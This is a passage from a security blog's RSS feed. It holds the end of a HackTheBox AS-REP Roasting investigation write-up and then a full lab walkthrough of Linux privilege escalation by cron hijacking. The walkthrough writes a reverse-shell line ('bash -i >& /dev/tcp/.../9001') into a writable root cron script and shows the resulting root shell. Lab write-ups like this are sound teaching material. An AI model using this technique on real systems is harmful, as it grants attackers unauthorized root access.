      "SubjectUserName": "happy.grunwald",</code></pre></div><p>I believe that&#8217;s basically all of it and our review supposed to be enough for analysis report:</p><ul><li><p>When did the AS-REP Roasting attack occur, and when did the attacker request the Kerberos ticket for the vulnerable user?</p><div class="highlighted_code_block" data-attrs="{&quot;language&quot;:&quot;plaintext&quot;,&quot;nodeId&quot;:null}" data-component-name="HighlightedCodeBlockToDOM"><pre class="shiki"><code class="language-plaintext">2024-05-29 06:36:40</code></pre></div></li><li><p>Please confirm the User Account that was targeted by the attacker.</p><div class="highlighted_code_block" data-attrs="{&quot;language&quot;:&quot;plaintext&quot;,&quot;nodeId&quot;:null}" data-component-name="HighlightedCodeBlockToDOM"><pre class="shiki"><code class="language-plaintext">arthur.kyle</code></pre></div></li><li><p>What was the SID of the account?</p><div class="highlighted_code_block" data-attrs="{&quot;language&quot;:&quot;plaintext&quot;,&quot;nodeId&quot;:null}" data-component-name="HighlightedCodeBlockToDOM"><pre class="shiki"><code class="language-plaintext">S-1-5-21-3239415629-1862073780-2394361899-1601</code></pre></div></li><li><p>It is crucial to identify the compromised user account and the workstation responsible for this attack. Please list the internal IP address of the compromised asset to assist our threat-hunting team.</p><div class="highlighted_code_block" data-attrs="{&quot;language&quot;:&quot;plaintext&quot;,&quot;nodeId&quot;:null}" data-component-name="HighlightedCodeBlockToDOM"><pre class="shiki"><code class="language-plaintext">172.17.79.129</code></pre></div></li><li><p>We do not have any artifacts from the source machine yet. Using the same DC Security logs, can you confirm the user account used to perform the ASREP Roasting attack so we can contain the compromised account/s?</p><div class="highlighted_code_block" data-attrs="{&quot;language&quot;:&quot;plaintext&quot;,&quot;nodeId&quot;:null}" data-component-name="HighlightedCodeBlockToDOM"><pre class="shiki"><code class="language-plaintext">happy.grunwald</code></pre></div></li></ul><div class="captioned-image-container"><figure><a class="image-link image2 is-viewable-img" target="_blank" href="https://substackcdn.com/image/fetch/$s_!ejrH!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F28614b17-dcbd-4b98-a2d9-da9c85ba3239_880x468.png" data-component-name="Image2ToDOM"><div class="image2-inset"><picture><source type="image/webp" srcset="https://substackcdn.com/image/fetch/$s_!ejrH!,w_424,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F28614b17-dcbd-4b98-a2d9-da9c85ba3239_880x468.png 424w, https://substackcdn.com/image/fetch/$s_!ejrH!,w_848,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F28614b17-dcbd-4b98-a2d9-da9c85ba3239_880x468.png 848w, https://substackcdn.com/image/fetch/$s_!ejrH!,w_1272,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F28614b17-dcbd-4b98-a2d9-da9c85ba3239_880x468.png 1272w, https://substackcdn.com/image/fetch/$s_!ejrH!,w_1456,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F28614b17-dcbd-4b98-a2d9-da9c85ba3239_880x468.png 1456w" sizes="100vw"><img src="https://substackcdn.com/image/fetch/$s_!ejrH!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F28614b17-dcbd-4b98-a2d9-da9c85ba3239_880x468.png" width="880" height="468" data-attrs="{&quot;src&quot;:&quot;https://substack-post-media.s3.amazonaws.com/public/images/28614b17-dcbd-4b98-a2d9-da9c85ba3239_880x468.png&quot;,&quot;srcNoWatermark&quot;:null,&quot;fullscreen&quot;:null,&quot;imageSize&quot;:null,&quot;height&quot;:468,&quot;width&quot;:880,&quot;resizeWidth&quot;:null,&quot;bytes&quot;:198756,&quot;alt&quot;:null,&quot;title&quot;:null,&quot;type&quot;:&quot;image/png&quot;,&quot;href&quot;:null,&quot;belowTheFold&quot;:true,&quot;topImage&quot;:false,&quot;internalRedirect&quot;:&quot;https://byt3n33dl3.substack.com/i/189471558?img=https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F28614b17-dcbd-4b98-a2d9-da9c85ba3239_880x468.png&quot;,&quot;isProcessing&quot;:false,&quot;align&quot;:null,&quot;offset&quot;:false}" class="sizing-normal" alt="" srcset="https://substackcdn.com/image/fetch/$s_!ejrH!,w_424,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F28614b17-dcbd-4b98-a2d9-da9c85ba3239_880x468.png 424w, https://substackcdn.com/image/fetch/$s_!ejrH!,w_848,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F28614b17-dcbd-4b98-a2d9-da9c85ba3239_880x468.png 848w, https://substackcdn.com/image/fetch/$s_!ejrH!,w_1272,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F28614b17-dcbd-4b98-a2d9-da9c85ba3239_880x468.png 1272w, https://substackcdn.com/image/fetch/$s_!ejrH!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F28614b17-dcbd-4b98-a2d9-da9c85ba3239_880x468.png 1456w" sizes="100vw" loading="lazy"></picture><div class="image-link-expand"><div class="pencraft pc-display-flex pc-gap-8 pc-reset"><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container restack-image"><svg role="img" width="20" height="20" viewBox="0 0 20 20" fill="none" stroke-width="1.5" stroke="var(--color-fg-primary)" stroke-linecap="round" stroke-linejoin="round" xmlns="http://www.w3.org/2000/svg"><g><title></title><path d="M2.53001 7.81595C3.49179 4.73911 6.43281 2.5 9.91173 2.5C13.1684 2.5 15.9537 4.46214 17.0852 7.23684L17.6179 8.67647M17.6179 8.67647L18.5002 4.26471M17.6179 8.67647L13.6473 6.91176M17.4995 12.1841C16.5378 15.2609 13.5967 17.5 10.1178 17.5C6.86118 17.5 4.07589 15.5379 2.94432 12.7632L2.41165 11.3235M2.41165 11.3235L1.5293 15.7353M2.41165 11.3235L6.38224 13.0882"></path></g></svg></button><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container view-image"><svg xmlns="http://www.w3.org/2000/svg" width="20" height="20" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round" class="lucide lucide-maximize2 lucide-maximize-2"><polyline points="15 3 21 3 21 9"></polyline><polyline points="9 21 3 21 3 15"></polyline><line x1="21" x2="14" y1="3" y2="10"></line><line x1="3" x2="10" y1="21" y2="14"></line></svg></button></div></div></div></a></figure></div><ul><li><p><a href="https://labs.hackthebox.com/achievement/sherlock/2489228/736">labs.hackthebox.com/achievement/sherlock/2489228/736</a></p></li></ul><p>Happy Defending, Thanks HackTheBox</p><ul><li><p><a href="https://github.com/byt3n33dl3">GitHub</a></p></li><li><p><a href="mailto:byt3n33dl3@proton.me">Mail</a></p></li></ul>]]></content:encoded></item><item><title><![CDATA[Cron Hijacking 101: Linux Privilege Escalation]]></title><description><![CDATA[Locate Deepest access layer activity to hijack, enable higher access takeover.]]></description><link>https://byt3n33dl3.substack.com/p/cron-hijacking-101-linux-privilege</link><guid isPermaLink="false">https://byt3n33dl3.substack.com/p/cron-hijacking-101-linux-privilege</guid><dc:creator><![CDATA[Sulaiman]]></dc:creator><pubDate>Fri, 27 Feb 2026 09:35:43 GMT</pubDate><enclosure url="https://substack-post-media.s3.amazonaws.com/public/images/29ace408-41cf-4f15-aa0d-26b8ee4e7f7b_571x358.png" length="0" type="image/jpeg"/><content:encoded><![CDATA[<h2>Enumeration</h2><p>On target:</p><div class="highlighted_code_block" data-attrs="{&quot;language&quot;:&quot;bash&quot;,&quot;nodeId&quot;:null}" data-component-name="HighlightedCodeBlockToDOM"><pre class="shiki"><code class="language-bash">user@debian:/tmp$ cat /etc/crontab
# /etc/crontab: system-wide crontab
# Unlike any other crontab you don't have to run the `crontab'
# command to install the new version when you edit this file
# and files in /etc/cron.d. These files also have username fields,
# that none of the other crontabs do.

SHELL=/bin/sh
PATH=/home/user:/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin

# m h dom mon dow user  command
17 *    * * *   root    cd / &amp;&amp; run-parts --report /etc/cron.hourly
25 6    * * *   root    test -x /usr/sbin/anacron || ( cd / &amp;&amp; run-parts --report /etc/cron.daily )
47 6    * * 7   root    test -x /usr/sbin/anacron || ( cd / &amp;&amp; run-parts --report /etc/cron.weekly )
52 6    1 * *   root    test -x /usr/sbin/anacron || ( cd / &amp;&amp; run-parts --report /etc/cron.monthly )
#
* * * * * root overwrite.sh
* * * * * root /usr/local/bin/compress.sh

user@debian:/tmp$ locate overwrite.sh
locate: warning: database `/var/cache/locate/locatedb' is more than 8 days old (actual age is 2114.0 days)
/usr/local/bin/overwrite.sh</code></pre></div><div class="highlighted_code_block" data-attrs="{&quot;language&quot;:&quot;bash&quot;,&quot;nodeId&quot;:&quot;b37b237c-7ddb-41a3-9a60-cd5a35fc92b9&quot;}" data-component-name="HighlightedCodeBlockToDOM"><pre class="shiki"><code class="language-bash">user@debian:/tmp$ ls -al /usr/local/bin/overwrite.sh
-rwxr--rw- 1 root staff 40 May 13  2017 /usr/local/bin/overwrite.sh</code></pre></div><p>As we see, there&#8217;s a Crontab activity owned by root on a specific directory, reminder this is our current User access:</p><div class="highlighted_code_block" data-attrs="{&quot;language&quot;:&quot;bash&quot;,&quot;nodeId&quot;:null}" data-component-name="HighlightedCodeBlockToDOM"><pre class="shiki"><code class="language-bash">user@debian:/tmp$ id
uid=1000(user) gid=1000(user) groups=1000(user),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev)</code></pre></div><h2>Attack</h2><p>How can we abuse?</p><div class="highlighted_code_block" data-attrs="{&quot;language&quot;:&quot;bash&quot;,&quot;nodeId&quot;:null}" data-component-name="HighlightedCodeBlockToDOM"><pre class="shiki"><code class="language-bash">user@debian:/tmp$ vi /usr/local/bin/overwrite.sh
user@debian:/tmp$ cat /usr/local/bin/overwrite.sh
#!/bin/bash

bash -i &gt;&amp; /dev/tcp/192.168.203.73/9001 0&gt;&amp;1</code></pre></div><p>By changing the Shell script into reverse-shell to Our Kali attack machine, the next Cron task running it will be calling back to Us.</p><div class="highlighted_code_block" data-attrs="{&quot;language&quot;:&quot;bash&quot;,&quot;nodeId&quot;:null}" data-component-name="HighlightedCodeBlockToDOM"><pre class="shiki"><code class="language-bash">&#9484;&#9472;&#9472;(kali&#12927;kali)-[~]
&#9492;&#9472;$ sudo nc -lvnp 9001      
listening on [any] 9001 ...</code></pre></div><p>And. . .Profitt!!</p><div class="highlighted_code_block" data-attrs="{&quot;language&quot;:&quot;bash&quot;,&quot;nodeId&quot;:null}" data-component-name="HighlightedCodeBlockToDOM"><pre class="shiki"><code class="language-bash">&#9484;&#9472;&#9472;(kali&#12927;kali)-[~]
&#9492;&#9472;$ sudo nc -lvnp 9001      
listening on [any] 9001 ...
connect to [192.168.203.73] from (UNKNOWN) [10.48.161.11] 51886
bash: no job control in this shell
root@debian:~# id
id
uid=0(root) gid=0(root) groups=0(root)
root@debian:~# whoami
whoami
root</code></pre></div><p>Hope you all like it and happy hacking!</p><ul><li><p><a href="https://github.com/byt3n33dl3">GitHub</a></p></li><li><p><a href="mailto:byt3n33dl3@proton.me">Mail</a></p></li></ul>]]></content:encoded></item></channel></rss>